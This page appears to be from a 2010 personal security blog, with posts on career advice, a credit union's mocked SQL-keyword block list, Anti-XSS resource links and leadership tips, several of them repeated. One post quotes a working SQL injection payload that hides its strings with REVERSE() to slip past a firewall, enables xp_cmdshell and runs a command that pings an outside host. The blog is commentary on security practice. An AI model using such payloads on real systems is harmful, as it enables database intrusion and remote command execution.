http://preachsecurity.blogspot.com/2010/04/infosec-career-advice.html
has some valid suggestions for information security professional
"If you want to contribute meaningfully to the Information Security field - go do something else first... business analyst risk analyst project manager, developer...anything! Learn how the business works, learn what keeps you employed - learn how your company and business makes money."
You probably already get the technology - but can you tell me how it applies to what the business does?"
Yes. Technology can only be embraced by business if it can either save money or make money. No matter how smart you are or how technical savvy you are, you need to convince business to buy in security.
Wednesday, May 19, 2010
The funny way to prevent SQL injection
The funny way to prevent SQL injection from Sacramento Credit Union:
Why are the Security Questions used?
The first time you login and enroll in Protection Plus, you will be asked to enter five Security Questions and corresponding answers. The Security Questions are used if you do not want to register the computer you are currently using. With the Security Questions, we can make sure it is you logging in when you use different computers, such as, a internet bar computer.
The answers to your Security Questions are case sensitive and cannot contain special characters like an apostrophe, or the words “insert,” “delete,” “drop,” “update,” “null,” or “select.”
Why can’t I use certain words like "drop" as part of my Security Question answers? There are certain words used by hackers to try to gain access to systems and manipulate data; therefore, the following words are restricted: "select," "delete," "update," "insert," "drop" and "null".
Google cache can be found at http://webcache.googleusercontent.com/search?q=cache%3A6LhOOjbpBVEJ%3Ahttps%3A%2F%2Fhomebank.sactocu.org%2FUA2004%2Ffaq-mfa.htm%2Bsactocu%2Bdrop%2Bselect&cd=1&hl=de&ct=clnk&client=ubuntu
They must forget to add shutdown, alter into the list.
Why are the Security Questions used?
The first time you login and enroll in Protection Plus, you will be asked to enter five Security Questions and corresponding answers. The Security Questions are used if you do not want to register the computer you are currently using. With the Security Questions, we can make sure it is you logging in when you use different computers, such as, a internet bar computer.
The answers to your Security Questions are case sensitive and cannot contain special characters like an apostrophe, or the words “insert,” “delete,” “drop,” “update,” “null,” or “select.”
Why can’t I use certain words like "drop" as part of my Security Question answers? There are certain words used by hackers to try to gain access to systems and manipulate data; therefore, the following words are restricted: "select," "delete," "update," "insert," "drop" and "null".
Google cache can be found at http://webcache.googleusercontent.com/search?q=cache%3A6LhOOjbpBVEJ%3Ahttps%3A%2F%2Fhomebank.sactocu.org%2FUA2004%2Ffaq-mfa.htm%2Bsactocu%2Bdrop%2Bselect&cd=1&hl=de&ct=clnk&client=ubuntu
They must forget to add shutdown, alter into the list.
Some links for XSS
Cross-Site Scripting (XSS) from OWASP
http://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
XSS Prevention Cheat Sheet from OWASP
http://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
Download link for Anti-XSS library V3.1
http://www.microsoft.com/downloads/details.aspx?FamilyId=051ee83c-5ccf-48ed-8463-02f56a6bfc09&displaylang=en
It comes with Sample code and Help file.
Additional resources about Anti-XSS library
Some FAQ questions about Anti-XSS library:
http://msdn.microsoft.com/en-us/security/aa973814.aspx
HTML Sanitization in Anti-XSS Library:
http://blogs.msdn.com/securitytools/archive/2009/09/01/html-sanitization-in-anti-xss-library.aspx
Difference between Anti-XSS library and HttpUtility.HtmlEncode
http://blogs.msdn.com/securitytools/archive/2009/07/09/differences-between-antixss-htmlencode-and-httputility-htmlencode-methods.aspx
The list of controls which automatically encode:
http://blogs.msdn.com/cisg/archive/2008/09/17/which-asp-net-controls-need-html-encoding.aspx.
http://blogs.msdn.com/sfaust/attachment/8918996.ashx
http://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
XSS Prevention Cheat Sheet from OWASP
http://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
Download link for Anti-XSS library V3.1
http://www.microsoft.com/downloads/details.aspx?FamilyId=051ee83c-5ccf-48ed-8463-02f56a6bfc09&displaylang=en
It comes with Sample code and Help file.
Additional resources about Anti-XSS library
Some FAQ questions about Anti-XSS library:
http://msdn.microsoft.com/en-us/security/aa973814.aspx
HTML Sanitization in Anti-XSS Library:
http://blogs.msdn.com/securitytools/archive/2009/09/01/html-sanitization-in-anti-xss-library.aspx
Difference between Anti-XSS library and HttpUtility.HtmlEncode
http://blogs.msdn.com/securitytools/archive/2009/07/09/differences-between-antixss-htmlencode-and-httputility-htmlencode-methods.aspx
The list of controls which automatically encode:
http://blogs.msdn.com/cisg/archive/2008/09/17/which-asp-net-controls-need-html-encoding.aspx.
http://blogs.msdn.com/sfaust/attachment/8918996.ashx
Monday, May 17, 2010
An interesting blog about reverse blind SQL injection
An interesting blog about reverse blind SQL injection
The application is subject to Blind SQL injection and the company is deploying both web application firewalls and network intrusion Prevention System. It seems that the web application firewall does an excellent job at staying current with the latest methods for bypassing Web Application Firewall technologies.
However, the backward attack is working. Most SQL databases support a reverse function. Here is the attack
var=1';DECLARE @a varchar(200) DECLARE @b varchar(200) DECLARE @c varchar(200) SET @a = REVERSE ('1 ,"snoitpo decnavda wohs" erugifnoc_ps.obd.retsam') EXEC (@a) RECONFIGURE SET @b = REVERSE ('1,"llehsdmc_px" erugifnoc_ps.obd.retsam') EXEC (@a) RECONFIGURE SET @c =REVERSE('"moc.dragarten gnip" llehsdmc_px') EXEC (@c);--
http://snosoft.blogspot.com/2010/05/reversenoitcejni-lqs-dnilb-bank-hacking.html
The application is subject to Blind SQL injection and the company is deploying both web application firewalls and network intrusion Prevention System. It seems that the web application firewall does an excellent job at staying current with the latest methods for bypassing Web Application Firewall technologies.
However, the backward attack is working. Most SQL databases support a reverse function. Here is the attack
var=1';DECLARE @a varchar(200) DECLARE @b varchar(200) DECLARE @c varchar(200) SET @a = REVERSE ('1 ,"snoitpo decnavda wohs" erugifnoc_ps.obd.retsam') EXEC (@a) RECONFIGURE SET @b = REVERSE ('1,"llehsdmc_px" erugifnoc_ps.obd.retsam') EXEC (@a) RECONFIGURE SET @c =REVERSE('"moc.dragarten gnip" llehsdmc_px') EXEC (@c);--
http://snosoft.blogspot.com/2010/05/reversenoitcejni-lqs-dnilb-bank-hacking.html
Thursday, May 13, 2010
How to become a good leader?
From http://www.scouting.org/scoutsource/BoyScouts/PatrolLeader/s8.aspx
It is amazing that how simple and truthful these tips are:
It is amazing that how simple and truthful these tips are:
- Keep your Word. Don't make promises you can't keep.
- Be Fair to All. A good leader shows no favorites. Don't allow friendships to keep you from being fair to all members of your patrol. Know who likes to what, and assign duties to patrol members by what they like to do.
- Be a Good Communicator. Yo don't need a commanding voice to be a good leader, but you must be willing to step out front with an effective "let's go." A good leader knows how to get and give information so that everyone understands what's going on.
- Be Flexible. Everything does not always go as planned. Be prepared to shift to "plan B" when "plan A" does not work.
- Be organized. The time you spend planing will be repaid many times over. At patrol meetings, record who agrees to do each task, and fill out the duty roster before going camping.
- Delegate. Some leaders assume that the job will not get done unless they do it themselves. Most people like to be challenged with a task. Empower your patrol members to do things they have never tried.
- Set an Example. The most important thing you can do is lead by example. Whatever you do, your patrol members are likely to do the same. A cheerful attitude can keep everyone's spirits up.
- Be Consistent. Nothing is more confusing than a leader who is one way one moment and another way a short time later. If your patrol knows what to expect from you, they will more likely respond positively to your leadership.
- Give Praise. The best way to get credit is to give it away. Often a "Nice job" is all the praise necessary to make a Scout feel he is contributing to the efforts of the patrol.
- Ask for Help. Don't be embarrassed to ask for help. You have many resources at your disposal. When confronted with a situation you don't know how to handle, ask someone with more experience for some advice and direction.
Subscribe to:
Comments (Atom)